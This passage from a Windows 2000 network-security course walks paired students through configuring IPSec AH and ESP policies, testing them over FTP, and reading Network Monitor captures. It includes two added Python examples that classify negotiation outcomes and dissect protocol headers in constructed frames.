6. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> Default Response, and click Edit.
7. Remove all choices but one by holding down the Shift key, selecting all but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users).
11. Verify that AH is checked and that the integrity algorithm is MD5.
12. Verify that ESP is unchecked.
13. Under Session Key Settings, verify that the boxes for generating new keys for both time and size are unchecked.
14. Click OK twice to return to the Rule Properties.
15. Switch to the Authentication Methods tab.
16. Click Edit.
17. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
18. Click OK.
19. Switch to the Connection Type tab, and verify that the default setting of All Network Connections is selected.
20. Click OK, and then click Close to finish the creation of the policy.
21. Close the ipsec.mmc.msc console, without saving changes.

Configuring FTP

Now that IPSec policies are configured on two machines, you need to test the policies to ensure that they work as you intended them to work. To do this, you'll bring up an FTP site on Student_Q and attempt to access this FTP site from Student_P. You'll do this with IPSec implemented on one machine and then on the other. You'll run Network Monitor to capture and record traffic between the two machines. You'll examine these captures and see where (in the packet) the IPSec headers reside. For greater clarity, we can verify this with the RFCs associated with IPSec, as well.

Hardening The Infrastructure (SCP)

TASK 2C-6
Setting Up the FTP Process

Note: Perform step 1 through step 6 only if you are designated as Student_Q.

1. From the Start menu, choose Programs → Administrative Tools → Internet Services Manager.
2. In the left pane, click your ftp server's name. Verify that your default FTP site is running. Verify its properties, and find out where the home directory is physically located. The default home directory is the \inetpub\ftproot folder. Close Internet Services Manager.
3. In Explorer, locate and navigate to the folder designated as the FTP home directory.
4. In this folder, create a text document.
5. Edit this document to input some text and save it as text1.txt.
6. Create and save three more similar text documents in the same folder. Use text2.txt, text3.txt, and text4.txt as the file names.

Note: Perform step 7 through step 12 only if you are designated as Student_P.

7. Open a command prompt.
8. Enter ftp IP_address_of_Student_Q to ftp to Student_Q's FTP site.
9. Log on as anonymous with no password.
10. Verify that you can access the text documents created on the Student_Q computer by using the DIR command.
11. Once you have verified that you can access the text documents, quit the ftp session by entering bye at the ftp prompt.
12. Leave this command prompt open.

Implementing the IPSec Policy

You have just tested a plain text ftp session. The following tasks will walk you through the process of implementing IPSec and testing the results in both directions. First, you will prove that you can connect even though IPSec is implemented on only one of the hosts.

TASK 2C-7
Implementing the 1_REQUEST_AH(md5)_only Policy

Note: Perform step 1 through step 4 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console.
2. Right-click the 1_REQUEST_AH(md5)_only policy and choose Assign.
3. Close the ipsec.mmc.msc console. If you are prompted to save changes, click No.
4. Start Network Monitor, and verify that it is going to collect packets from the interface connected to Student_P. Start a new capture, and allow Network Monitor to capture packets until Student_P has completed step 5 through step 9.

Note: You will be using Network Monitor repeatedly throughout this course, so you might want to create a shortcut for it on the Windows Desktop.

Note: Perform step 5 through step 9 only if you are designated as Student_P.

5. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
6. Log on as anonymous with no password.
7. Enter dir to see a list of files hosted on the ftp site.
8. Exit the ftp session.
9. Leave the command prompt open.

Request-only Session Analysis

Why was your attempt successful? What is the reason for the brief delay? This is because the policy is designed to request only, not demand, IPSec. If the remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.
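As an added example (not part of the original course material), the following Python script classifies what happened in a capture like the ones these tasks produce, working from a per-frame summary rather than raw packets. The addresses, the Frame rows and the three sample captures are constructed to mirror the frame sequences the tasks describe (ARP in frames 1 and 2, a SYN in frame 3, ISAKMP on UDP port 500 from frame 4 onward); the function and field names are the example's own. The point it makes is the one made above: a Request policy that hears no ISAKMP reply answers the peer in clear text, and a capture reviewer can spot that downgrade as plain TCP sent by the requesting host after its own ISAKMP attempts, whereas a Require policy keeps sending ISAKMP and never answers in the clear.

```python
"""Classify the IPSec negotiation outcome for one host pair from a frame summary.

Added example; not part of the course text.  The rows below are constructed to
mirror the frame sequences the tasks describe, not a real Network Monitor export.
"""
from collections import namedtuple

# One row per captured frame: number, source, destination, protocol, ports.
# Ports are 0 where the protocol has none (ARP, AH, ESP).
Frame = namedtuple("Frame", "num src dst proto sport dport")

ISAKMP_PORT = 500
Q, P = "10.0.0.1", "10.0.0.2"   # constructed addresses for Student_Q and Student_P


def classify_session(frames, local_ip, peer_ip):
    """Judge what happened between local_ip (the host whose policy is under test)
    and peer_ip.  Returns a dict with:
      verdict: 'no-negotiation'     local host never sent ISAKMP
               'protected'          AH or ESP frames followed the negotiation
               'cleartext-fallback' local host sent ISAKMP, got no IPSec, then
                                    answered the peer in plain TCP (Request policy)
               'stalled'            ISAKMP kept going; no IPSec and no plain TCP
                                    from the local host (Require policy, mismatch)
      isakmp_attempts: ISAKMP frames sent by the local host
      first_cleartext_frame: number of the first plain TCP frame the local host
                             sent after starting ISAKMP, or None
    """
    attempts = 0
    protected = False
    first_clear = None
    for f in frames:
        if {f.src, f.dst} != {local_ip, peer_ip}:
            continue                          # some other conversation
        if f.proto == "UDP" and ISAKMP_PORT in (f.sport, f.dport):
            if f.src == local_ip:
                attempts += 1
        elif f.proto in ("AH", "ESP"):
            protected = True
        elif (f.proto == "TCP" and f.src == local_ip
              and attempts and not protected and first_clear is None):
            # The local host replied in the clear after it had asked for IPSec.
            first_clear = f.num
    if attempts == 0:
        verdict = "no-negotiation"
    elif protected:
        verdict = "protected"
    elif first_clear is not None:
        verdict = "cleartext-fallback"
    else:
        verdict = "stalled"
    return {"verdict": verdict, "isakmp_attempts": attempts,
            "first_cleartext_frame": first_clear}


# Constructed captures.  Request-only (Task 2C-8): two ISAKMP tries from
# Student_Q, then a plain three-way handshake in frames 6, 7 and 8.
REQUEST_ONLY = [
    Frame(1, P, Q, "ARP", 0, 0), Frame(2, Q, P, "ARP", 0, 0),
    Frame(3, P, Q, "TCP", 1045, 21),
    Frame(4, Q, P, "UDP", 500, 500), Frame(5, Q, P, "UDP", 500, 500),
    Frame(6, P, Q, "TCP", 1045, 21), Frame(7, Q, P, "TCP", 21, 1045),
    Frame(8, P, Q, "TCP", 1045, 21), Frame(9, Q, P, "TCP", 21, 1045),
]
# Request-and-respond (Task 2C-10): ISAKMP interplay from frame 5, then AH.
REQUEST_RESPOND = [
    Frame(1, P, Q, "ARP", 0, 0), Frame(2, Q, P, "ARP", 0, 0),
    Frame(3, P, Q, "TCP", 1045, 21),
] + [Frame(n, Q if n % 2 == 0 else P, P if n % 2 == 0 else Q, "UDP", 500, 500)
     for n in range(4, 14)] + [
    Frame(14, P, Q, "AH", 0, 0), Frame(15, Q, P, "AH", 0, 0), Frame(16, P, Q, "AH", 0, 0),
]
# Require with an unaware peer (Task 2C-13): ISAKMP repeats, peer keeps sending SYN.
REQUIRE_MISMATCH = [
    Frame(1, P, Q, "ARP", 0, 0), Frame(2, Q, P, "ARP", 0, 0),
    Frame(3, P, Q, "TCP", 1045, 21),
    Frame(4, Q, P, "UDP", 500, 500), Frame(5, Q, P, "UDP", 500, 500),
    Frame(6, P, Q, "TCP", 1045, 21), Frame(7, Q, P, "UDP", 500, 500),
    Frame(8, P, Q, "TCP", 1045, 21),
]

if __name__ == "__main__":
    for name, cap in (("request-only", REQUEST_ONLY),
                      ("request-and-respond", REQUEST_RESPOND),
                      ("require-mismatch", REQUIRE_MISMATCH)):
        print(name, classify_session(cap, Q, P))
```

Run with Student_Q as the local host: the request-only capture is reported as a cleartext fallback at frame 7 (Student_Q's SYN-ACK in the clear), the request-and-respond capture as protected, and the require mismatch as stalled. Swapping the roles (Student_P as local host) yields no-negotiation, because Student_P never sent ISAKMP in any of these captures.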

TASK 2C-8
Analyzing the Request-only Session

Note: Perform this task only if you are designated as Student_Q.

1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).
3. In frame 4, observe that the protocol is ISAKMP (UDP port 500). When it does not hear from Student_P, it tries again approximately a second later. When it does not hear from Student_P again, it falls back to insecure communication, and the three-way handshake proceeds as before (in frames 6, 7, and 8). Once the connection is made, the session is established in clear text, with no IPSec. You are able to see the payload and full headers of all the packets, with no evidence of IPSec.

Note: For this step, and subsequent steps that deal with the ISAKMP protocol, your classroom configuration might not yield the expected results, due to timing issues as the students complete their assigned steps. You can have them try to restart the computer, and then try redoing the activity.

4. Close Network Monitor. You can save your capture to a file, if you like.

Implementing a Request-and-Respond Policy

In the previous task, you were able to see that even though you had IPSec enabled in one direction, the policy allowed for unsecured communication. When Student_P responded with no IPSec, Student_Q went ahead and accepted the session, and traffic continued without IPSec. In the next task, you will configure Student_P to respond to Student_Q's IPSec policy.

TASK 2C-9
Configuring a Request-and-Respond IPSec Session

Note: Perform step 1 only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Assign. Close the ipsec.mmc.msc console, without saving changes. Then, wait until Student_Q performs the next step.

Note: Perform step 2 only if you are designated as Student_Q.

2. Activate Network Monitor, and start a capture.

Note: Perform the rest of this task only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site.
6. Exit the ftp session.
7. Close the command prompt.

Request-and-Respond Session Analysis

In the second attempt at communication, the temporary delay that was visible in the earlier task was not present. This is because the second host was now able to respond to the IPSec request initiated by the ftp server. There was no need to move down the list to a different method of communication, thus saving a bit of time. In the following task, you will use Network Monitor to analyze this session, and to see how the IPSec policy was implemented.

Some things to look for during this analysis include:
IP identifies AH with a protocol ID of 0x33 (51).
AH identifies TCP with a Next Header of 0x6 (6).
TCP identifies FTP with a destination port of 0x15 (21).

TASK 2C-10
Analyzing the Request-and-Respond Session

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
3. Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).
4. Observe that, when Student_P agrees to comply with the IPSec request (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.
5. Observe that the actual three-way handshake is now completed in frames 14 and 15.
6. Observe that, from frame 16 onward until the session teardown, the AH ensures integrity of communication between the two machines.

7. Double-click a frame whose protocol is identified by Network Monitor as FTP.
8. Observe the sequence of protocol identification: Ethernet, then IP, then AH, then TCP, then FTP. As noted earlier:
Ethernet identifies the protocol IP with an Ethertype of 0x800.
IP identifies AH with a protocol ID of 0x33 (51).
AH identifies TCP with a Next Header of 0x6 (6).
TCP identifies FTP with a destination port of 0x15 (21).
9. Observe that there is no encryption: the AH only signs the packet; it does not encrypt it.
10. In fact, look around frame 33. Near there, you should be able to see the name of the text file in response to the dir (LIST) command.
11. Close Network Monitor. You can save your capture to a file if you like.

Implementing a Require IPSec Policy

Now let's modify the situation a bit. You will configure Student_Q to demand IPSec of other computers. You will use the Require policy instead of the Request policy. From Student_P, you will attempt to communicate with Student_Q and fail. Then you will reassign the Respond policy on Student_P so that you will be able to re-establish communications with Student_Q.

TASK 2C-11
Implementing the 2_REQUIRE_AH(md5)_only Policy

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Un-assign. Then close the ipsec.mmc.msc console.

Note: Perform the rest of this task only if you are designated as Student_Q.

2. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_AH(md5)_only policy, and choose Un-assign.
3. In the right pane, right-click and choose Create IP Security Policy, then click Next.
4. For the IP Security Policy Name, enter 2_REQUIRE_AH(md5)_only, and click Next.
5. Uncheck Activate The Default Response Rule, and click Next.
6. Uncheck Edit Properties, and click Finish.
7. Double-click the new policy.
8. On the Rules tab, uncheck Use Add Wizard if it's checked, and click Add.
9. On the IP Filter List tab, click the radio button for All IP Traffic.
10. Switch to the Filter Action tab.
11. Click the radio button for Require Security.
12. Click the Edit button.
13. Leave the radio button selected for Negotiate Security.
14. Remove all but one method by holding down the Shift key, selecting all but one of the choices, and clicking Remove.
15. When prompted with Are You Sure?, click Yes.
16. Select the remaining method, and click Edit.
17. Under Security Method, click the Settings button found under Custom (For Expert Users).
18. Verify that AH is checked and that the integrity algorithm is MD5.
19. Verify that ESP is unchecked.
20. Under the Session Key settings, uncheck the two boxes for generating new keys for time and size.
21. Click OK. If you see an information box indicating that you are on a Medium security level, click OK to agree to it.
22. Click OK twice.
23. Switch to the Authentication Methods tab.
24. Click Edit.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
26. Click OK to close the Edit Authentication Method Properties dialog box.
27. Click Close twice to close the Rule Properties.

Mismatched AH Implementation

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Let's see what happens when Student_P does not follow Student_Q's lead.

TASK 2C-12
Attempting to Use Different IPSec Policies

Note: Perform step 1 through step 3 only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 2_REQUIRE_AH(md5)_only policy and choose Assign.
2. Activate Network Monitor, and make sure that it is going to collect packets from the interface connected to Student_P. This is the Partner interface.
3. Allow Network Monitor to capture packets until Student_P has finished the rest of the task.

Note: Perform the rest of this task only if you are designated as Student_P.

4. At a command prompt, again enter ftp IP_address_of_Student_Q.
5. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out.
6. Enter quit to stop the ftp attempt.

Mismatched IPSec Session Analysis

Why was your attempt unsuccessful? What is the reason for the substantial delay? This is because Student_Q's policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. The substantial delay occurred because Student_Q was trying to establish an IPSec communication with Student_P.

TASK 2C-13
Analyzing a Mismatched IPSec Policy Session

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
3. Observe that, because the policy on Student_Q says to require IPSec communication, Student_Q begins the negotiation process (in frame 4) with the ISAKMP protocol. When it does not hear from Student_P, approximately a second later, it tries again. Student_P, meanwhile, keeps knocking on Student_Q's door with a SYN packet, as it has no idea how to respond to the ISAKMP exchange. Student_Q keeps plugging away with ISAKMP because its policy will allow it to proceed only after ISAKMP negotiations have been successful.
4. Close Network Monitor. You can save your capture to a file if you like.

Implementing and Analyzing a Require IPSec Policy Session

Clearly, in order for Student_P to communicate, it must use an appropriate IPSec policy. Now, you will configure Student_P to respond to Student_Q's IPSec policy. Once you have enabled the policy, you will capture and analyze the IPSec traffic in Network Monitor.

TASK 2C-14
Implementing and Analyzing the Require Response Policy

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy and choose Assign. Then close the ipsec.mmc.msc console.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture as soon as Student_P enables the IPSec policy, but before Student_P attempts to ftp.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site.
6. Exit the ftp session, and close the command prompt.

Note: Perform the rest of this task only if you are designated as Student_Q.

7. In Network Monitor, stop and view the capture.
8. Observe that these captures are exactly the same as when the 1_REQUEST_AH(md5)_only policy was in force earlier in this topic. There is no difference with respect to the negotiation process, there is no difference with respect to the three-way handshake, and so forth.
9. Close Network Monitor. You can save your capture to a file if you like.

Topic 2D
IPSec ESP Implementation

In the previous topic, you examined the AH implementation in Windows 2000. You implemented the different types of AH, and analyzed the communication in Network Monitor. In this topic, you will see how to configure a computer to use the encryption provided with ESP, and compare the implementation options of this form of IPSec to the AH implementations.

Implementing a Request ESP IPSec Policy

Let's start our investigation of ESP encryption by creating a Request policy. The tools and the basic procedure are the same as you used to implement AH Request policies; just some of the options you select will be slightly different.

TASK 2D-1
Creating the 3_REQUEST_ESP(des)_only IPSec Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. If necessary, open your ipsec.mmc.msc console. In the right pane, right-click and choose Create IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 3_REQUEST_ESP(des)_only, and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
7. On the IP Filter List tab, click the radio button for All IP Traffic.
8. Switch to the Filter Action tab.
9. Click the radio button for Request Security (Optional).

10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. Read the options presented to you under Security Method Preference Order.
13. Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove. There might be only one option in some cases, based on your current OS configuration. If so, skip the next step.
14. When prompted with Are You Sure?, click Yes.
15. Select the remaining method, and click Edit.
16. Under Security Method, click the Settings button found under Custom (For Expert Users).
17. Verify that AH is unchecked.
18. Verify that ESP is checked.
19. Leave ESP's integrity algorithm set to <None>.
20. For Encryption Algorithm, select DES.
21. Under the Session Key settings, verify that the boxes for generating new keys for both time and size are unchecked.
22. Click OK three times to return to the New Rule Properties.
23. Switch to the Authentication Methods tab.
24. Click Edit.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
26. Click OK, and then click Close to return to the Policy Properties.
27. On the Rules tab, check <Dynamic> Default Response, and verify that the Use Add Wizard check box is unchecked. Click Edit.
28. Under Security Methods, remove all but one of the methods.
29. When prompted with Are You Sure?, click Yes.
30. Select the remaining method, and click Edit.
31. Under Security Method, click the Settings button found under Custom (For Expert Users).
32. Verify that AH is unchecked.
33. Verify that ESP is checked.

34. Verify that ESP's integrity algorithm is set to <None>.
35. For ESP's encryption, select DES.
36. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
37. Click OK twice to return to the Rule Properties.
38. Switch to the Authentication Methods tab.
39. Click Edit.
40. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
41. Click OK twice, and then click Close to exit from the Policy Properties.
42. Close the ipsec.mmc.msc, without saving settings.

Configuring the ESP IPSec Response

You have configured a policy wherein Student_Q will request other computers that attempt to communicate with it to implement ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. If communication were attempted at this point, the two hosts would not be able to send data to one another. The second host, Student_P in this case, must be configured to communicate using ESP as well.

During the creation of this policy, you will see five columns presented as Security Methods: Type, AH Integrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). Because you will have named this policy 3_RESPOND_ESP(des)_only, you'll simplify the list and offer exactly one choice, as you did in the other rules. In this case, you are creating a rule so that the host will respond to requests for IP Security that rely only on ESP confidentiality by using the DES encryption algorithm.

TASK 2D-2
Creating the 3_RESPOND_ESP(des)_only IPSec Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 1_RESPOND_AH(md5)_only policy. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 3_RESPOND_ESP(des)_only, and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.
7. Remove all but one Security Method by holding the Shift key, selecting all but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users).
11. Verify that AH is unchecked.
12. Verify that ESP is checked.
13. Verify that ESP's integrity algorithm is set to <None>.
14. For Encryption Algorithm, select DES.
15. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
16. Click OK twice to return to the Rule Properties.
17. Switch to the Authentication Methods tab.
18. Click Edit.
19. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
20. Click OK twice, and then click Close to end the creation of the policy.
21. Close the ipsec.mmc.msc without saving settings.

ESP Request-and-Response Session Analysis

Now that you have two hosts each configured with an ESP IPSec policy, you will enable those policies. You will then initiate network traffic, and analyze the traffic in Network Monitor. During the analysis stage, keep in mind the differences you see between the ESP implementation and what you saw in the AH implementation.

The first task will walk through the steps of using IPSec with ESP on one host, and not the other. As with the 1_REQUEST_AH(md5)_only policy, this transaction is also successful between Student_P and Student_Q because Student_Q's policy is designed to request only, not demand, IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. As you saw before, the brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P.

TASK 2D-3
Enabling IPSec ESP Policies

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy and choose Assign. Assigning this policy automatically unassigns the policy that was in effect.
2. Start Network Monitor, make sure that it is going to collect packets from the interface connected to Student_P, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At a command prompt, again enter ftp IP_address_of_Student_Q.
4. Observe that you can successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
5. Log on as anonymous with no password.
6. Enter dir to see a list of files hosted on the ftp site.
7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.
9. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3). Because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4).
10. Observe that in frame 4, the protocol is ISAKMP (UDP port 500). When it does not hear from Student_P, it tries again approximately a second later. When it does not hear from Student_P again, it falls back to insecure communication, and the three-way handshake proceeds as before (in frames 6, 7, and 8).
11. Close Network Monitor. You can save your capture to a file if you like.

Implementing an ESP IPSec Session

As you saw, with the mismatched IPSec policies as defined, there still is some communication; however, it is not secure communication. In the next task, you will enable IPSec on both ends and initiate communication. Then, you will examine the network traffic in Network Monitor to see if, indeed, it is encrypted.

TASK 2D-4
Configuring and Analyzing an ESP IPSec Session

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 5 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site, and exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

6. In Network Monitor, stop and view the capture.
7. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
8. Observe that, because the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) using the ISAKMP protocol (UDP port 500).
9. Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.
10. Observe that the actual three-way handshake is now completed in frames 14 and 15.
11. Close Network Monitor. You can save your capture to a file if you like.

ESP Analysis

In the last task, you looked at the three-way handshake in frames 14 and 15. Are you sure you were looking at the three-way handshake? What do you see here that's different from the earlier capture (the one resulting from the AH_only policy)? You cannot see any of the TCP flags, connection setup, three-way handshake completion, or data transfer; in fact, nothing but encrypted stuff shows up! The protocol is listed simply as ESP. Nobody but these two endpoints can decrypt packets destined for them. Try to look for the name of the text file in response to the dir (LIST) command. From frame 14 onward until the session teardown, ESP ensures the confidentiality of communication between the two machines; however, you have no way of knowing anything about the integrity of the packet, apart from those checks and balances built into TCP/IP. You never chose either the AH protocol or the integrity algorithm of ESP. You chose only ESP for encryption.
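To show concretely what Task 2C-10 step 8 and the ESP analysis above describe (the header chain Ethernet, IP, AH, TCP, FTP, identified by an Ethertype of 0x800, an IP protocol of 0x33, an AH Next Header of 0x6 and a TCP port of 0x15, versus ESP, where dissection stops after the SPI and sequence number), here is an added Python example that is not part of the course text. It builds its own frames (placeholder MAC and IP addresses, a zero ICV standing in for the HMAC-MD5 value, and a byte run standing in for ciphertext, all labelled as constructed in the code) and walks them the way Network Monitor's protocol tree does. The function protocol_chain and the _eth, _ipv4, _tcp, _udp, _ah and _esp helpers are the example's own names.

```python
"""Walk the header chain of an Ethernet frame the way Network Monitor's
protocol tree does: Ethernet -> IP -> (AH) -> TCP/UDP -> FTP/ISAKMP, or
Ethernet -> IP -> ESP and stop, because everything after the ESP SPI and
sequence number is ciphertext.

Added example; not part of the course text.  All frames are constructed here
(addresses, SPIs, the ICV and the "ciphertext" are placeholders), not captures.
"""
import struct

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP, PROTO_UDP, PROTO_ESP, PROTO_AH = 0x06, 0x11, 0x32, 0x33
PORT_FTP, PORT_ISAKMP = 21, 500


def protocol_chain(frame):
    """Return (chain, payload): the protocol names a dissector can identify, and
    the application payload it can read (None when it cannot read any)."""
    chain = ["Ethernet"]
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return chain, None
    chain.append("IP")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4              # IP header length in bytes
    proto = ip[9]                          # IP Protocol field (0x33 = AH, 0x32 = ESP)
    body = ip[ihl:]
    if proto == PROTO_AH:
        chain.append("AH")
        # AH: Next Header(1) Payload Len(1) Reserved(2) SPI(4) Seq(4) ICV(...)
        # Payload Len counts 32-bit words minus 2, so the header is (len + 2) * 4 bytes.
        proto, body = body[0], body[(body[1] + 2) * 4:]
    if proto == PROTO_ESP:
        chain.append("ESP")                # SPI and Seq are readable; nothing else is
        return chain, None
    if proto == PROTO_TCP:
        chain.append("TCP")
        sport, dport = struct.unpack("!HH", body[:4])
        data = body[(body[12] >> 4) * 4:]  # skip the TCP header (Data Offset * 4)
        if PORT_FTP in (sport, dport):
            chain.append("FTP")
        return chain, data
    if proto == PROTO_UDP:
        chain.append("UDP")
        sport, dport = struct.unpack("!HH", body[:4])
        if PORT_ISAKMP in (sport, dport):
            chain.append("ISAKMP")
        return chain, body[8:]
    return chain, body


# --- builders for the constructed frames (placeholder addresses throughout) ---
def _eth(payload):
    return bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + \
        struct.pack("!H", ETHERTYPE_IPV4) + payload

def _ipv4(proto, payload):  # checksum left 0; the dissector does not need it
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0,
                       64, proto, 0, bytes([10, 0, 0, 2]), bytes([10, 0, 0, 1])) + payload

def _tcp(sport, dport, payload):
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload

def _udp(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload

def _ah(next_header, payload, icv=bytes(12)):     # HMAC-MD5-96 ICV is 12 bytes; zeros here
    words_minus_2 = (12 + len(icv)) // 4 - 2
    return struct.pack("!BBHII", next_header, words_minus_2, 0, 0x01020304, 1) + icv + payload

def _esp(ciphertext):
    return struct.pack("!II", 0x0A0B0C0D, 1) + ciphertext


FTP_BANNER = b"220 Student_Q FTP service ready.\r\n"
FRAME_CLEAR_FTP = _eth(_ipv4(PROTO_TCP, _tcp(PORT_FTP, 1045, FTP_BANNER)))
FRAME_AH_FTP = _eth(_ipv4(PROTO_AH, _ah(PROTO_TCP, _tcp(PORT_FTP, 1045, FTP_BANNER))))
FRAME_ESP = _eth(_ipv4(PROTO_ESP, _esp(bytes(range(200, 232)))))  # stand-in ciphertext
FRAME_ISAKMP = _eth(_ipv4(PROTO_UDP, _udp(PORT_ISAKMP, PORT_ISAKMP, bytes(28))))

if __name__ == "__main__":
    for name, frame in (("clear", FRAME_CLEAR_FTP), ("AH", FRAME_AH_FTP),
                        ("ESP", FRAME_ESP), ("ISAKMP", FRAME_ISAKMP)):
        chain, data = protocol_chain(frame)
        print(f"{name:7s} {' > '.join(chain):35s} payload={data!r}")
```

The AH frame dissects all the way to FTP and the banner text is readable, which is exactly why AH is said to sign but not encrypt; the ESP frame stops at ESP with no readable payload, which is what Network Monitor shows from frame 14 onward in the task above. Only the SPI and sequence number are visible to an eavesdropper, so the presence of FTP (or any other application) in an ESP-protected session cannot be inferred from the packet contents alone.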

Creating a Require ESP IPSec Policy

Again, let's modify the situation a bit. We'll configure Student_Q to demand IPSec of other computers. We'll use the Require policy instead of the Request policy. From Student_P, we'll attempt to communicate with Student_Q and fail. We'll then reassign the Respond policy on Student_P and re-establish communications with Student_Q.

TASK 2D-5
Implementing the 4_REQUIRE_ESP(des)_only IPSec Policy

Note: Perform the following step only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Un-assign.

Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along.

